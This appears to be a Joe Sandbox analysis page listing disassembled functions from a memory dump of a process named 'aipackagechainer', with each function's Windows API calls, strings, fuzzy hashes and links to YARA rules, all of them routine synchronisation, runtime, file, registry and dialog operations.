FreeLibrary.KERNEL32(00000000,?,000DDA64,D11C52E5,0009D001,00000000,00000000,00000000,?,000DDCAF,00000021,FlsSetValue,00102A8C,00102A94,00000000), ref: 000DDA18

Strings

ext-ms-, xrefs: 000DD9C2
api-ms-, xrefs: 000DD9AE

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 611f35cbe837d12b6389be77cdb4055d70ddb03413c67cc01236ba6e61d77ba5
Instruction ID: b4343c313afc0e4da7fca77cedf89a574191ca039fab715ba81b9737f6e7d84f
Opcode Fuzzy Hash: 611f35cbe837d12b6389be77cdb4055d70ddb03413c67cc01236ba6e61d77ba5
Instruction Fuzzy Hash: 93210535A01350ABD7719B28EC51A6A7799AF41770F240223E905A73D0DB74EE41C6F1

Function 000C8F40 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 000C8F5A

Part of subcall function 000C7DB0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C7E0F
Part of subcall function 000C7DB0: GetLastError.KERNEL32 ref: 000C7E1A

SetEvent.KERNEL32(?,?,7556E010,?,?,75573080,000C9311,?), ref: 000C8F8A
GetLastError.KERNEL32(?,75573080,000C9311,?), ref: 000C8F9A
SetEvent.KERNEL32(?,?,75573080,000C9311,?), ref: 000C8FA2
GetLastError.KERNEL32(?,75573080,000C9311,?), ref: 000C8FAC
EnterCriticalSection.KERNEL32(?,?,75573080,000C9311,?), ref: 000C8FC6
LeaveCriticalSection.KERNEL32(?,?,75573080,000C9311,?), ref: 000C8FE2

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CriticalEventSection$EnterLeaveObjectSingleWait__alloca_probe_16
String ID:
API String ID: 2730365815-0
Opcode ID: 174ced3b7996a2a5a28c8e5b3565b48d1a35c382cc4b6193f3d25c93e5a469ca
Instruction ID: 7ecd2809078b176ccee8dde3f3358413730f2a4cd3e0b1925624b02ab9e45184
Opcode Fuzzy Hash: 174ced3b7996a2a5a28c8e5b3565b48d1a35c382cc4b6193f3d25c93e5a469ca
Instruction Fuzzy Hash: 08113D716007049BE720DF69D844FAFB7EAFF58710F00492DEA5AC3611DB34A801DB65

Function 000C9B7D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,000C9BF8,000C9B5B,000C9DFC), ref: 000C9B94
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000C9BAA
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000C9BBF

Strings

ReleaseSRWLockExclusive, xrefs: 000C9BB4
KERNEL32.DLL, xrefs: 000C9B8F
AcquireSRWLockExclusive, xrefs: 000C9BA4

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: efecdda2dee50bf8d36870e30179d725da8476956f376262a922c1184da09a73
Instruction ID: c8dec98bc634897bbb5687b5388c621f3f0f2acf3bd234432c2814c51239507b
Opcode Fuzzy Hash: efecdda2dee50bf8d36870e30179d725da8476956f376262a922c1184da09a73
Instruction Fuzzy Hash: 2CF0C831205262BB1B714F64BE98FBF32CC9B01744324003DE901D6960EF61CC85F691

Function 000A0190 Relevance: 10.5, APIs: 7, Instructions: 44sleepwindowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000040A), ref: 000A01A5
SetWindowTextW.USER32(00000000,?), ref: 000A01AD
GetDlgItem.USER32(?,0000040B), ref: 000A01BB
SendMessageW.USER32(00000000,00000410,00000002,00000000), ref: 000A01CD
ShowWindow.USER32(00000000,00000000), ref: 000A01DC
Sleep.KERNEL32(000000C8), ref: 000A01E3
ShowWindow.USER32(00000000,00000001), ref: 000A01EC

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$ItemShow$MessageSendSleepText
String ID:
API String ID: 106862907-0
Opcode ID: ab4517cadc87f0b720d4a31c013f46f392b8058eee31e48c2b510c233012b67a
Instruction ID: 501e08c14790a826549cd67b11c06279a96ef4db1a510405d28eba87b47c2258
Opcode Fuzzy Hash: ab4517cadc87f0b720d4a31c013f46f392b8058eee31e48c2b510c233012b67a
Instruction Fuzzy Hash: 14018172640341ABF7105BA4DC8DF7A7B69EF89B11F144418F701AB2F0C7B59851DB25

Function 00075780 Relevance: 9.3, APIs: 6, Instructions: 324memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,D11C52E5), ref: 000757F1
GetProcessHeap.KERNEL32(?,00000000), ref: 00075906
HeapFree.KERNEL32(00000000,?,00000000), ref: 0007590C
GetProcessHeap.KERNEL32(?,00000000), ref: 0007599F
HeapFree.KERNEL32(00000000,?,00000000), ref: 000759A5
CoUninitialize.OLE32 ref: 00075B28

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Heap$FreeProcess$InitializeUninitialize
String ID:
API String ID: 4239879612-0
Opcode ID: 23a408e32d4804619052a4430d74a9ee2c5ee874506e40c2ce0394da2c5e28fe
Instruction ID: 7a50dbc81d4189134c320c5984498dc7b563ffac791c1dcbc5a8e7920b41c818
Opcode Fuzzy Hash: 23a408e32d4804619052a4430d74a9ee2c5ee874506e40c2ce0394da2c5e28fe
Instruction Fuzzy Hash: 23D15A70D00609DFDB24CF68C984BEDBBB4BF45305F24829DE449A7292DBB89A44CB55

Function 000E9F44 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4bf4fb19c3ee0b120ff787f5756cb1cb108651552611b6f8715b4703cefafd
Instruction ID: 37e42823ed6da8f751edfa3c9868f164d0197ae0bcefcac21b9486105536da7c
Opcode Fuzzy Hash: 9c4bf4fb19c3ee0b120ff787f5756cb1cb108651552611b6f8715b4703cefafd
Instruction Fuzzy Hash: 20B1C570B04289AFDB11DF9AC890BEDBBF5AF4A300F144199E505B7392C775A942CB62

Function 000646F0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 462fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,00000000,00000000,?,D11C52E5,?,00000004), ref: 00064768
MoveFileW.KERNEL32(?,00000000), ref: 00064B3B
DeleteFileW.KERNEL32(?), ref: 00064B85
FreeLibrary.KERNEL32(00000000), ref: 00064E1B

Strings

p1Wu, xrefs: 00064B85

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$DeleteFreeLibraryMoveNameTemp
String ID: p1Wu
API String ID: 2027907882-3125263879
Opcode ID: 4da187f3d53a386b314964ad600f2b908727cfa485117c3683ca3d9d849063c7
Instruction ID: 166130b57b58e59988310df64161195e89e51a2f35ea4232f3389c30a23d3a0e
Opcode Fuzzy Hash: 4da187f3d53a386b314964ad600f2b908727cfa485117c3683ca3d9d849063c7
Instruction Fuzzy Hash: 93125970D112699BDB64DF28CC98BEDB7B2BF54304F1442D9E409A7291EB746B84CF90

Function 00068AE0 Relevance: 9.2, APIs: 6, Instructions: 153COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00068B2A
std::_Lockit::_Lockit.LIBCPMT ref: 00068B4C
std::_Lockit::~_Lockit.LIBCPMT ref: 00068B74
__Getctype.LIBCPMT ref: 00068C55
std::_Facet_Register.LIBCPMT ref: 00068CB7
std::_Lockit::~_Lockit.LIBCPMT ref: 00068CE1

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 3543b0f177b9d058cd92104ed72fd6f6c02975a4cbd204de37edb85ba365a6da
Instruction ID: 811753dc5dcc71218856e89c4d0811005b660dadd46e47386b204fa90aa9fd39
Opcode Fuzzy Hash: 3543b0f177b9d058cd92104ed72fd6f6c02975a4cbd204de37edb85ba365a6da
Instruction Fuzzy Hash: EE61BDB1D01649DFDB20CF68C940BAEBBF0EF14314F14825DD945AB392EB74AA85CB91

Function 0006CCD0 Relevance: 9.1, APIs: 6, Instructions: 140COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0006CD0D
std::_Lockit::_Lockit.LIBCPMT ref: 0006CD2F
std::_Lockit::~_Lockit.LIBCPMT ref: 0006CD57
__Getcoll.LIBCPMT ref: 0006CE21
std::_Facet_Register.LIBCPMT ref: 0006CE66
std::_Lockit::~_Lockit.LIBCPMT ref: 0006CE9E

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: 2133f4caabc92cbf5b797837bd9b9017aefcfaebd166b3a94eb0e433f12ceab4
Instruction ID: ac271403310a828c18bac117a37a46fe417257b298c68abd79c70dc29ee29a4a
Opcode Fuzzy Hash: 2133f4caabc92cbf5b797837bd9b9017aefcfaebd166b3a94eb0e433f12ceab4
Instruction Fuzzy Hash: 9551ACB0D05248EFDB11DF98D880BEDBBB1FF44324F148059E819AB392DB74AA45CB91

Function 0007FCC0 Relevance: 9.1, APIs: 6, Instructions: 130COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?,?), ref: 0007FCFB
CharNextW.USER32(00000001,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD1B
CharNextW.USER32(00000000,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD2B
CharNextW.USER32(00000027,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FD34
CharNextW.USER32(?,?,00000000,00000000,7556F360,?,000808FF,00000000,00000000,?,?,?,00000000,00000000,00080BA3,?), ref: 0007FDA0

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 18894e34e0c5c4d14f327a62ddb90e66524eabac30ee0ed8be653cd46bb70e94
Instruction ID: 297b6b37f7888068e66549d03d700a707dbb1a5d8e8e496a85fc87a0179e3f4f
Opcode Fuzzy Hash: 18894e34e0c5c4d14f327a62ddb90e66524eabac30ee0ed8be653cd46bb70e94
Instruction Fuzzy Hash: D0410636A002068FC7209F29DC485BAB3E7FFC8311B45C93AE5488B265E7389D41CB54

Function 000A4270 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 356registryCOMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 000A42E2
RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?,?,00000001,?), ref: 000A45A4
RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000010,00000000), ref: 000A461E
RegCloseKey.ADVAPI32(00000000), ref: 000A46DD

Strings

hu, xrefs: 000A46DD

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: QueryValue$Close_wcsrchr
String ID: hu
API String ID: 3512256112-423011080
Opcode ID: d4fee3c76ca9a1ff00893419f891264fba6b46e4c536350cc5bc89a5136084a0
Instruction ID: 31fc4e844d5c5725cdd0d106451f07c45134d9b11db92f75cc26975a2a1d6aa9
Opcode Fuzzy Hash: d4fee3c76ca9a1ff00893419f891264fba6b46e4c536350cc5bc89a5136084a0
Instruction Fuzzy Hash: 96E17E75901619ABDB20DFA8CC88BD9B7F4EF49320F1482D9E419A7291DBB49E84CF50

Function 000AFBF0 Relevance: 9.1, APIs: 6, Instructions: 102windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000425), ref: 000AFC15
GetWindowTextLengthW.USER32(00000000), ref: 000AFC20
GetWindowTextW.USER32(?,?,?), ref: 000AFC71
MessageBeep.USER32(000000FF), ref: 000AFCBD
GetDlgItem.USER32(?,00000425), ref: 000AFCD2
SetFocus.USER32(00000000,?,?), ref: 000AFCD9

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ItemTextWindow$BeepFocusLengthMessage
String ID:
API String ID: 2221317226-0
Opcode ID: 77bc57abd74304204f09531ad53b0d94533f077a1cf79f66619ac870191d6470
Instruction ID: eebaba92dbb0949c2823dd85bb8f6a313a8a3d9bf7928ec0fe020d7151c463d1
Opcode Fuzzy Hash: 77bc57abd74304204f09531ad53b0d94533f077a1cf79f66619ac870191d6470
Instruction Fuzzy Hash: 5431AD71600606DFDB04DFA9D98D96ABBE6FF88325F10413CF885C7261DB36A904CB91

Function 000A8CD0 Relevance: 9.1, APIs: 6, Instructions: 87threadCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 000A8CFB
SetLastError.KERNEL32(0000000E), ref: 000A8D18
GetCurrentThreadId.KERNEL32 ref: 000A8D47
EnterCriticalSection.KERNEL32(0012BCD4), ref: 000A8D67
LeaveCriticalSection.KERNEL32(0012BCD4), ref: 000A8D8B
DialogBoxParamW.USER32(000000D8,00000000,Function_00038810,00000000), ref: 000A8DA8

Part of subcall function 000CA3DA: GetProcessHeap.KERNEL32(00000008,00000008,?,0009718E), ref: 000CA3DF
Part of subcall function 000CA3DA: HeapAlloc.KERNEL32(00000000), ref: 000CA3E6

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalHeapSection$ActiveAllocCurrentDialogEnterErrorLastLeaveParamProcessThreadWindow
String ID:
API String ID: 828238446-0
Opcode ID: 88cdd4f0121399c43562e21ea4505b57f6b1abd8427e8ee70a4026e76f057761
Instruction ID: 3fef8e01e88934be855311f9d3537d8e63dac2f5874a47524023f12c15789cae
Opcode Fuzzy Hash: 88cdd4f0121399c43562e21ea4505b57f6b1abd8427e8ee70a4026e76f057761
Instruction Fuzzy Hash: 72310275A04349AFD710CFA8DC48B59BBF4FB04715F10861AEA14A7AD0DBB56810CB52

Function 000A9220 Relevance: 9.1, APIs: 6, Instructions: 86windowCOMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,80000000), ref: 000A92B1
VerSetConditionMask.KERNEL32(00000000), ref: 000A92B5
VerSetConditionMask.KERNEL32(00000000), ref: 000A92B9
VerifyVersionInfoW.KERNEL32(?), ref: 000A92DE
GetParent.USER32(000A881E), ref: 000A92FB
SendMessageW.USER32(?,00000432,00000000,?), ref: 000A9338

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ConditionMask$InfoMessageParentSendVerifyVersion
String ID:
API String ID: 2374517313-0
Opcode ID: cbce5fadf9e814ea9e1f37881191d7d9f66c031453e5f4843f4dc721a714b93a
Instruction ID: a4767933878efb2e9702015a2b9d6ce892052a922d6fcf963cecc39aca257a16
Opcode Fuzzy Hash: cbce5fadf9e814ea9e1f37881191d7d9f66c031453e5f4843f4dc721a714b93a
Instruction Fuzzy Hash: AE312FB1518384AFE360CF24DC49B6BBBE8EBC8704F40491EF58497290D7B59944CB96

Function 000CE420 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,000CE417,0008ABBC,0010C440,00000002,D11C52E5), ref: 000CE42E
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000CE43C
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000CE455
SetLastError.KERNEL32(00000000,?,000CE417,0008ABBC,0010C440,00000002,D11C52E5), ref: 000CE4A7

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 928cf93e4951bf1fee85bc9d014e9f33d159b169efdbd630617129a66ef715a6
Instruction ID: 370b208acf63f722bdd3b478aedc740020e046411177128afe02141048f09826
Opcode Fuzzy Hash: 928cf93e4951bf1fee85bc9d014e9f33d159b169efdbd630617129a66ef715a6
Instruction Fuzzy Hash: 4101D43260C3517FE7782778EC85FAF2B88EB02775720036EF510A55E2EF254C56A154

Function 000C7BC0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,?,?,000C92C1), ref: 000C7BD2
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,000C92C1), ref: 000C7BE2
GetLastError.KERNEL32 ref: 000C7BEF
ResetEvent.KERNEL32(?), ref: 000C7C07
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 000C7C17
GetLastError.KERNEL32 ref: 000C7C24

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Event$CreateErrorLastReset
String ID:
API String ID: 3053278375-0
Opcode ID: a6ad062d1e21610cb578f2cb0efc44a56640110115df3873d6caaa14ede30a8b
Instruction ID: 7b9d43349f603d968fddef16b6b430f6111b645b10c49b6ddac03463fa2a9f89
Opcode Fuzzy Hash: a6ad062d1e21610cb578f2cb0efc44a56640110115df3873d6caaa14ede30a8b
Instruction Fuzzy Hash: A5014F303083439FFBA45B39AC15F6E72D8AB44B01F14082DE90AD65E0FB94EC419E54

Function 000C93D0 Relevance: 9.0, APIs: 6, Instructions: 37synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000002,?,?,000C36BF,D11C52E5), ref: 000C93E6
GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C93F0
WaitForSingleObject.KERNEL32(?,000000FF,?,?,000C36BF,D11C52E5), ref: 000C93FC
GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C9407
CloseHandle.KERNEL32(?,?,?,000C36BF,D11C52E5), ref: 000C9411
GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C941B

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CloseEventHandleObjectSingleWait
String ID:
API String ID: 891035169-0
Opcode ID: f8313d1693d491df0852cf54f60fcc7489c4d1f8146e687379c00622405680a5
Instruction ID: 2831b51bd79bfed08a9ccaeff72f253a3c28f51a7c3e8005bb6b7af215b226c7
Opcode Fuzzy Hash: f8313d1693d491df0852cf54f60fcc7489c4d1f8146e687379c00622405680a5
Instruction Fuzzy Hash: 7AF030306007518BEA645B7AEC4CF6A77DCBF90735B058A2DE561C36A0DBB4EC46CA21

Function 00085170 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,D11C52E5,?,?,?,?,?,?,?,?,?,?,?,00000000,000F242F,000000FF), ref: 000851BB
CreateDirectoryW.KERNEL32(?,00000000,?,?,0010C404,00000001,?,?,D11C52E5), ref: 0008527A
GetLastError.KERNEL32(?,D11C52E5), ref: 00085288

Strings

\\?\UNC\, xrefs: 00084E7F, 00084EF8, 00084EFE
\\?\, xrefs: 00084E16, 00084F67, 00084F6D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

